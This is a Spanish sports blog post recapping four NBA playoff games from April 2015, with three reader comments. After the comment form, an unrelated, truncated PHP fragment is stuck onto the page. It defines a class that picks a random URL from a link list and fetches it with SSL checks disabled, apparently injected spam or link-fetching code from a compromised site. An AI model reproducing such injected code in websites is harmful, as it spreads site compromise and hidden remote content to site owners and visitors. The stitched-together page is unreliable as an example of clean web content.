La Crónica: La injusticia

27 de April de 2015 por txusma

Clevelend Cavaliers y Washington Wizards ya están en semifinales de conferencia. Todos contábamos con Lebron y co. pero pocos debían apostar por la barrida de los capitalinos que comenzaban la serie fuera de casa. La palabra ‘decepcionante’ se queda cortar para definir lo que ha sido la postemporada de los Raptors. En cambio, los Mavs evitaron la humillación gracias a un par de secundarios y los Clippers empataron la eliminatoria en un gran partido de Chris Paul.

LA Clippers 114 – San Antonio Spurs 105

Empecemos por la serie de la series, la que personaliza la injusticia del actual sistema de competición. En el Este ganas 53 partidos y te enfrentas a los Celtics. En el Oeste ganas 56 y te toca verte las caras con los actuales campeones de la NBA. Así son las cosas. Clippers y Spurs nos están deleitando con un espectáculo mayúsculo que vivió anoche un nuevo capítulo. Tras el revés del tercer partido, los Clippers resurgieron de sus cenizas y de nuevo con Chris Paul en modo ‘dios del baloncesto’ asaltaron el AT&T Center de San Antonio. El base procedente de Wake Forest dominó el partido de principio a fin y suyas fueras las acciones que sentenciaron el partido a partir de la mitad del último cuarto. A este punto los Clippers llegaban ya con algo de ventaja gracias a Austin Rivers que sorprendió a propios y extraños con 16 puntos prácticamente sin fallo en 17 minutos. Blake Griffin, autor de 20 puntos, 19 rebotes y 7 asistencias, y JJ Redick, que anotó 17 puntos, también estuvieron entre los destacados. Enfrente unos Spurs liderados por Kawhi Leonard y un Tim Duncan que se convirtió en el primer jugador de la historia en disputar más de 9.000 minutos en partidos de Playoffs. Tony Parker dio muestras de recuperacion y anotó 18 puntos aunque sigue flaqueando en el apartado asistente. El francés lleva 11 asistencias… en toda la serie.

Cleveland Cavaliers 101 – Boston Celtics 93

Los Cavaliers han acabado barriendo a unos Celtics que han dado mucha guerra. El partido de ayer fue muy duro con acciones incluso violentas y una lesión potencialmente grave. Kevin Love se dislocó el hombro cuando peleaba con Kelly Olynyk por un balón dividido. Hoy le harán más pruebas pero se habla de que se puede perder mínimo un par de semanas. Además, Kendrick Perkins le envió un recadito a Jae Crowder en forma de placaje y después le tocó la cara cuando el jugador de los Celtics le encaraba y JR Smith fue expulsado tras soltar un impresionante manotazo a la mandíbula nuevamente de Jae Crowder. En el ámbito puramente deportivo, Lebron James (27 puntos, 10 rebotes y 8 asistencias) y los suyos dominaron el partido de principio a fin pero los locales no se rindieron nunca, ni cuando perdían de 21 puntos al descanso. Incluso se llegaron a poner a 6 puntos y posesión a falta de 37 segundos pero Luigi Datome falló el triple que podía haber dado mucha emoción a los últimos segundos del choque. Descanso para los Cavs y esperanza futura para los Celtics a pesar de la eliminación.

Toronto Raptors 94 – Washington Wizards 125

Al final del primer cuarto los locales ganaban de 14 puntos, a la media parte de 16 y al final del tercer cuarto de 32. En definitiva: no hubo partido. Los Raptors mostraron una vez una inoperancia total y fueron un juguete en manos de los Wizards. Tan solo en el segundo cuarto, cuando consiguieron un parcial de 11-2 que les acercaba a 13 puntos demostraron que algo de sangre pasaba por sus venas. Poco se puede salvar de su juego y de sus jugadores. En cambio, los locales se gustaron y guiados por un Paul Pierce en su salsa presentan su candidatura a la final de conferencia. Buenos partidos de John Wall, de Bradley Beal, de Marcin Gortat… incluso de Otto Porter, que completó una muy buena defensa sobre Demar DeRozan. Ahora a Washington le esperan unos días de descanso mientras se resuelve la serie entre Atlanta y Brooklyn. Los canadienses en cambios vuelven al norte con la cola entre las piernas y muchas dudas de cara su futuro.

Houston Rockets 109 – Dallas Mavericks 124

Los locales estaban ante la espadas y la pared y la respuesta de Rick Carlisle fue sacar de titulares a dos super secundarios como JJ Barea y Al-Farouq Aminu. La jugada le salió perfecta. El base acabó con 17 puntos y 13 asistencias y el alero con 16 puntos y 12 rebotes, doble-doble para ambos. Junto a los 31 puntos de Monta Ellis y el dominio bajo los tableros de los locales fue suficiente para llevarse un partido que empezó a ponerse de cara en el segundo cuarto, cuando consiguieron dar la vuelta al marcador y remontar 12 puntos a los Rockets aprovechando una mala racha en el tiro. La mala racha de los visitantes continuó en el tercer cuarto y los Mavericks aprovecharon para escaparse definitivamente y conseguir 24 puntos de ventaja.

Comenta

3 comentarios a esta entrada

  1. Sabas dice:
    #1

    Me da pena Toronto, es una franquicia que nunca termina de despegar. Le veo un futuro incierto. Visto lo visto, parece que Washington, va a ser el unico rival de entidad con el que posiblemente se tenga que enfrentar Cleveland, los demás no los veo muy entonados.

      Citar

  2. Nacho dice:
    #2

    Los Bulla, si no tontean mucho con los Bucks, serán un rival de entidad, pueden perder 4-0 contra los Cavs, pero les van a exigir la leche a LeBron y Cía.

      Citar

  3. sabas dice:
    #3

    Sobre el papel deberia ser asi, pero no termino de verles del todo bien. Me esperaba mas de ellos.

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>